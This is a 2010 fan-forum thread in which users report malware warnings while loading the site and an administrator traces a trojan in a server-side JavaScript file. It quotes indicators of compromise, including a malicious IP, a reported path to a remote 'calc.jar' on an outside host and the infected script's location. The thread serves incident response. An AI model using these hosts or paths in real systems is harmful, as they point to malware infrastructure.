Is anybody else getting hit with any Spyware or Malware from RZ? I'm not 100 percent confident this has come from RZ - and I'm far from a computer expert - but I've gotten trojan flags both last night on the home PC and again this morning on the work PC immediately when visiting RZ.

This is the alert that popped up this morning as soon as RZ loaded:

http://img834.imageshack.us/img834/6165/rzaugust22010.jpg

Any ideas?

I've gotten a few in the last couple days too.

Mine says "an intrusion attempt was blocked"
it's a "MSIE Java deployment toolkit input invalidation"

Seems to occur during a search routine.

I'll pass this along to our host...thank you.

Any particular page you're visiting when you get these messages?

I'm not seeing anything "typical" - but if you can tell me where you were, that would help me track it down.

Thanks

Joe

Mine was the main page itself immediately after it loaded: http://www.redszone.com/forums/index.php

Nothing has popped up in the last few hours though.

I'm wondering if maybe it was an infected google ad, there's nothing to indicate a compromise in the code at all, from what I'm seeing, but I'll keep looking

The latest version of this software is Latest version available: 4.0.5

Current version is 3.8.6 - it might be time to upgrade, or evaluate the upgrade options

Not much to add, but I got this exact same message the first time I visited the main page today.

If anyone encounters this again, please do a screen capture if possible, note the page you were on when it happened, and the approximate time (with time zone).

Email to: mobileterminal@gmail.com

Thanks

Joe,

One thing I've noticed when loading any page on redszone.com within the past day or so: it seems to be routing through a numerical IP address: 96.30.16.218. I don't ever remember seeing this before. Did we recently move to a different server or what would account for this?

Your server IP is 64.128.190.227

That IP (96.30.16.218) is not even owned by us:

NameServer: NS2.WIREDTREE.COM
NameServer: NS1.WIREDTREE.COM
RegDate: 2008-12-03
Updated: 2009-10-29
Ref: http://whois.arin.net/rest/net/NET-96-30-0-0-1

OrgName: Cogswell Enterprises Inc.
OrgId: COGSW
Address: 53 W Jackson Blvd.
Address: Suite 635
City: Chicago

http://www.wiredtree.com/

Not sure where you'd be seeing that

Joe,

One thing I've noticed when loading any page on redszone.com within the past day or so: it seems to be routing through a numerical IP address: 96.30.16.218. I don't ever remember seeing this before. Did we recently move to a different server or what would account for this?


Have you done an adware/malware scan on your computer? I can't imagine where that'd be coming from

Have you done an adware/malware scan on your computer? I can't imagine where that'd be coming from
I'll rescan...thanks.

I had gotten a Tidserv virus about 10 days ago. I was able to get rid of it with "tdsskiller" (though the computer's now slow and I'm slowly fixing those problems). It's a rootkit virus that attacks anti-virus software at first so that you can't use antivirus software (then it attacks .dll files, the desktop, the registry, and it hides itself so that even if you use an antivirus software on a hard media it won't find it, and it first came around about DEC of 2008, but it's had a huge re-appearance since June. It's really nasty and destroys everything.

I thought maybe I had gotten it from one of the "forum" sites I visited....Bengals Jungle, this one...or maybe Rotoworld, but I actually believe it came through "Google Images", as Google had just changed their "images" format, and it occurred immediately after I had looked up something there. I figured Google had a hole in it that was discovered by the hackers. The hackers come from China on this particular "tidserv" virus.

Got a virus message on the wife's laptop as well. I will try and screen save it the next time it pops up. Usually happens when I enter via the main page. The laptop has come across it three times in the past few days.

All,

Based on a recommendation from vBulletin, I've temporarily disabled all Google ads. Please reply to this thread immediately if you receive another virus/malware alert.

I'll rescan...thanks.
Well, I ran scans using the latest definitions from several programs and found nothing that accounts for this. I confirmed that it only happens with vBulletin, as other areas of the site and external sites do not call the address I mentioned. I disabled the ads and all other custom vBulletin code and the site is still accessed, at least for me, whenever any vBulletin page loads. Does anyone else have this issue and/or know how to fix it?

java tries to load up on me when i open the main page sometimes.

Within the past 20 minutes since the ads have been disabled?

Within the past 20 minutes since the ads have been disabled?

yep. it tries to load but comes up as an error. not sure what that is.

Can you guys please clear your cookies (at least for this site) and try again? Please let me know...

Just got another trojan alert this morning at 9:10am eastern time as soon as I loaded up this Sun Deck thread: http://www.redszone.com/forums/showthread.php?t=84230. The alert is the identical alert that I posted in the original post of this thread.

Every time I load a page, avast is telling me "threat detected."

edit: clientscript/yui/yahoo-dom-even is the location that it's giving me. Hope that helps.

I continue to get these as well

I'm working on getting it resolved with our host and vBulletin...please continue to post any new information and thanks for your patience.

When I came here today Avast told me this malware had been blocked:

http://www.redszone.com/forums/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=386|>{gzip}

I am still getting malware/spyware alerts as well via Avast, same as CTA mentioned.

Every time I load a page, avast is telling me "threat detected."

Same here. Keep getting a Malware Blocked

Every page I load on this site, no matter the computer, has the malware warning from Avast.

logging into RedsZone, I continue to get a Java Virtual Machine Launcher which logs:

"Unable to access jarfile \\109.236.81.40\public\public\calc.jar"

A google search on this string shows this: http://jsunpack.jeek.org/dec/go?report=1ec9b510fa8ece79e1cde50102d3e3ab1a207f7f

Every time I load a page, avast is telling me "threat detected."

edit: clientscript/yui/yahoo-dom-even is the location that it's giving me. Hope that helps.

I'm getting the same thing

Cleared my cookies, restarted browser, am still getting the Malware warning every time I click on a link in the forums, or when I load up Redszone.com.

Hitting "abort connection" in Avast lets me continue unharmed.


http://www.redszone.com/forums/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=386\{gzip}

All,

I believe I've solved the problem - can you please give it another try?

Problem fixed on my computer. I can you tell us what the problem was?

So far, so good, no more warnings - thanks.

Problem fixed on my computer. I can you tell us what the problem was?
Somehow, we had a trojan horse(s) on the server - the above posts helped me locate and delete it. Thanks for everyone's help and patience.

Your server IP is 64.128.190.227

That IP (96.30.16.218) is not even owned by us:

NameServer: NS2.WIREDTREE.COM
NameServer: NS1.WIREDTREE.COM
RegDate: 2008-12-03
Updated: 2009-10-29
Ref: http://whois.arin.net/rest/net/NET-96-30-0-0-1 (http://whois.arin.net/rest/net/NET-96-30-0-0-1)

OrgName: Cogswell Enterprises Inc.
OrgId: COGSW
Address: 53 W Jackson Blvd.
Address: Suite 635
City: Chicago

http://www.wiredtree.com/ (http://www.wiredtree.com/)

Not sure where you'd be seeing that

Mr Spacely will be mad that Jetson let Cogswell intrude on Spacely Spocket's web server.

All,

I believe I've solved the problem - can you please give it another try?

The site is working fine for me now.

My latest Malwarebyte scan tonight came up clean, and the site does seem to be running a bit quicker tonight than it had been in previous days. Looks like everything is good to go now on my end so far.

Definetly running quicker tonight. The one thing I have noticed and this may not be related but it looks like the live updates are not really working tonight to automatically refresh threads.

Definetly running quicker tonight. The one thing I have noticed and this may not be related but it looks like the live updates are not really working tonight to automatically refresh threads.
Thanks for letting me know - it should be working again.

I posted earlier today getting the warnings. Everything seems okay and pretty responsive.

Thanks for the quick actions bh.

Ok, very weird.

I had a subscription to this thread, it's gone. I hadn't seen any replies in my email, figured there was no further issue - low and behold, two new pages.

So Boss, it was a corrupted java script? Can you email me the details (file name, etc) and I can look through the logs to see how it got there. This really has me wondering

All,

I believe I've solved the problem - can you please give it another try?



Good Job, Thanks Boss. :thumbup:

Google Chrome has just started giving me a malware warning when I load the page. I've had that happen on several other forums in the past. I'll keep trying and let you know if the problem continues.

Edit: I'm running Chrome on Mac OS 10.5.8. I am not getting the warning with Safari or Opera.

Google Chrome has just started giving me a malware warning when I load the page. I've had that happen on several other forums in the past. I'll keep trying and let you know if the problem continues.

Edit: I'm running Chrome on Mac OS 10.5.8. I am not getting the warning with Safari or Opera.

I'm getting the same warning using Google Chrome on Windows Vista.


Warning: Visiting this site may harm your computer!
The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.

I've just had the same experience on Chrome on my Mac.

The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.
Learn more about how to protect yourself from harmful software online.

Interestingly, it does not happen when using an "Incognito" window. Perhaps it's a malicious cookie from an ad?

I've just had the same experience on Chrome on my Mac.

The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.
Learn more about how to protect yourself from harmful software online.

Interestingly, it does not happen when using an "Incognito" window. Perhaps it's a malicious cookie from an ad?

I just got the same thing, Chrome on Windows7.

Definitely agree with the cookie idea.

I turned Google ads temporarily off again - can you Chrome users clear your cookies for this site and let me know if you still get that message? That will allow us to pinpoint if it's the ads or not.

I turned Google ads temporarily off again - can you Chrome users clear your cookies for this site and let me know if you still get that message? That will allow us to pinpoint if it's the ads or not.

I cleared my cookies from RedsZone and am no longer getting the message. Thanks!

I turned Google ads temporarily off again - can you Chrome users clear your cookies for this site and let me know if you still get that message? That will allow us to pinpoint if it's the ads or not.

I cleared my cookies and I'm still getting the warning.

Very bizarre - I just downloaded Chrome, fired up RZ and did not get any warnings. Could those of you who are maybe restart your PC's and see if you still are? If you still are, what page(s) are you visiting when the warning comes up - all?

Very bizarre - I just downloaded Chrome, fired up RZ and did not get any warnings. Could those of you who are maybe restart your PC's and see if you still are? If you still are, what page(s) are you visiting when the warning comes up - all?

I only see it when I load the main page.

I only saw it the one time, and only in Chrome. Hasn't happened since.

I tried Chrome (I don't use it much and hadn't started it in months) on the Mac and receive no warnings or alerts.

I can't replicate it using Chrome with or without Google AdSense turned on. Please let me know if any of you continue to see it and where, as well as any other pertinent information. Thanks.

I received this warning from chrome for the first time this morning off a fresh boot of my PC. It was right at the main page load. I also received the warning again when I clicked on the latest updated thread in ORG.

Still getting it every time I go anywhere on the site.

I still get it every time I load the main page. For the first time today, I also got it when I opened a thread in tORG.

Still getting it every time I go anywhere on the site.

What browser are you and yab1112 each using?

Sent from my DROIDX using Tapatalk

I find it scary that at the bottom of this thread are two "malware" ads by Google.

BTW, I use google chrome and XP HE, but ceased getting any malware warnings after I used tdsskiller two weeks ago.

What browser are you and yab1112 each using?

Sent from my DROIDX using Tapatalk

I'm using Chrome. I tried in Firefox just to see what would happen and it worked fine.

I'm still occasionally getting a malware warning from the main page. I also just got one when I tried to open this thread.

I just got it for the first time while using IE. Avast picked it up.

C:\Users\Davis\AppData\Local\Microsoft\Windows\Tem porary Internet Files\Low\Content.IE5\MF1K6860\yahoo-dom-event[1].js [L] HTML:Script-inf (0)
File was successfully moved to chest...

this was the specific file: yahoo-dom-event[1].js

Sorry if anything I just posted is redundant, I didn't bother reading through most of this thread.

I contacted our host to request a virus/malware scan be run on our server and I'm waiting to hear back, so the ball is in his court. Thanks for everyone's help.

Boss I got the following warnings when just opening up RZ in Google Chrome - typically I use tapatalk from my iPhone but today I'm using my home computer.

I've cleared cookies & restarted and am still getting the warning.


Warning: Visiting this site may harm your computer!
The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.
Learn more about how to protect yourself from harmful software online.

I followed the Google Diagnostic page - here is what it lists

Safe Browsing
Diagnostic page for 96.30.16.0

What is the current listing status for 96.30.16.0?
This site is not currently listed as suspicious.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 9 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-08-06, and the last time suspicious content was found on this site was on 2010-08-06.
Malicious software includes 32 exploit(s), 14 trojan(s).

This site was hosted on 1 network(s) including AS19066 (WIREDTREE).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 96.30.16.0 appeared to function as an intermediary for the infection of 2 site(s) including full18.com/, yellowbullet.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 15 domain(s), including buildtutorial.com/, full18.com/, yellowbullet.com/.

Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

Today I am not getting the warning. Everything appears to be fine.

This is beyond bizarre...either I didn't remove all traces of the problem initially or it's come back to bite us. I'm still doing all that I can to address the problem.

All,

Our host identified one problem, which I addressed - those of you that have been receiving the malware warning(s), can you please clear your RedsZone cookies and try again? Thanks.

I'm getting the same warning using Google Chrome on Windows Vista.


Warning: Visiting this site may harm your computer!
The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.

I'm getting the same thing.

I'm getting the same thing.
I disabled all our custom add-ons and Google AdSense...can you try again and let me know? This would be a lot easier to diagnose if I could reproduce the problem on my end...

GAC says he is getting:

GAC, you do not have permission to access this page. This could be due to one of several reasons:

Your user account may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.
when he tries to post.

It looks like he recently tried to change his email address without clicking on the confirmation code...I went ahead and took care of it, so he should be good to go now.

I tried to edit my previous post earlier, and say that I got it corrected by following your instruction of clearing cookies, but all of a sudden was getting this message:


GAC, you do not have permission to access this page. This could be due to one of several reasons:

Your user account may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.

which wouldn't allow me to do anything, even PM you, other then login.

I'm assuming you got RedsBaron's PM this morning alerting you to my situation and got it corrected? Because obviously I'm now able to post/reply. LOL

But as of right now all is honky dory.

ochre just informed me it may have been due to the fact I updated my email in the User CP. While there this morning, trying to find out how to clear cookies for RZ, I noticed it had a really old email, so I updated it. Didn't know, or see, a confirmation button, but only a "save changes" button, which I clicked and it said it successfully changed it.

All is well now.

Thanks Boss, ochre, and RB.

ochre just informed me it may have been due to the fact I updated my email in the User CP. While there this morning, trying to find out how to clear cookies for RZ, I noticed it had a really old email, so I updated it. Didn't know, or see, a confirmation button, but only a "save changes" button, which I clicked and it said it successfully changed it.

All is well now.

Thanks Boss, ochre, and RB.

I'm not getting the warning anymore.

How do I clear cookies for RZ?

You may clear all your cookies by clicking here (http://www.redszone.com/forums/login.php?do=logout&logouthash=1281314865-ef1e8364d12dc7adb045315bf8bbd9cdb32e0f0e). If you return to the main index page via the link provided and you are still logged in, you may have to remove your cookies manually.

In Internet Explorer 6 on Windows XP:

1. Click the "Tools" menu.
2. Select "Internet Options" from the menu that appears.
3. Click "Delete Cookies" on the dialog box that appears. It will be in the center area of the "General" tab.

In Mozilla Firefox:

1. Click the "Tools" menu.
2. Select "Options" from the menu that appears.
3. From the dialog box, select "Privacy" on the left.
4. Find "Cookies" on the main pane, and click the "Clear" button adjacent to it.

Your cookies should now be removed. You may want to restart the computer and revisit the forums to be sure.

Boss - I run Google Chrome, been running it all season with 0 issues.

I haven't came across any warnings about Spyware/Malware when going to the site.

Just an FYI

OK, I re-enabled the custom add-ons (Chat, Live Topic, etc.) but kept Google AdSense off. Can someone that has had the problem let me know if they still see it? Unfortunately, we're going to have to keep doing this trial and error until I find the culprit since I can't reproduce the issue on my end.

OK, I re-enabled the custom add-ons (Chat, Live Topic, etc.) but kept Google AdSense off. Can someone that has had the problem let me know if they still see it? Unfortunately, we're going to have to keep doing this trial and error until I find the culprit since I can't reproduce the issue on my end.


I cleared my cookies last night on my home computer (I use Chrome) and it was OK.

I cleared my cookies last night on my home computer (I use Chrome) and it was OK.
Can you give it another try ASAP now that the custom add-ons are back on (though AdSense is still off) and let me know?

Can you give it another try ASAP now that the custom add-ons are back on (though AdSense is still off) and let me know?

I'll let you know when I get home tonight.

I cleared my cookies last night on my home computer

:ughmamoru

I only got it one time, with chrome on windows7.

hadn't seen it before, haven't seen it since.

I only got it one time, with chrome on windows7.

hadn't seen it before, haven't seen it since.
You got it at the time you made your post?

Everything's looking good at home, Boss.

You got it at the time you made your post?

yep, my first one in this thread. hasn't happened since.

Man.......I'm glad I read this thread. This site and a few others have been painfully slow for the past week or so for me. Cleared my cookies, downloaded avast, and it's working fine now.

yep, my first one in this thread. hasn't happened since.
That's extremely strange - the fact that you got it after I disabled all AdSense tells me the problem is not resolved. What I don't understand is 1). why I can't reproduce it using Chrome (and why only Chrome users seem to get the message) and 2). why it sporadically appears. I'll do some additional checking with vBulletin and see what I can find.

Is this currently still an issue for anyone?

I was browsing the Sundeck forum and something hijacked my browser and took me to the old Cincinnati Enquirer Reds Talk forums where anything goes with moaning and groaning and personal attacks. Looks like the malware/virus was also spreading to the Old Red Guard. I think it's under control right now, but I get the occasional reroute once in awhile.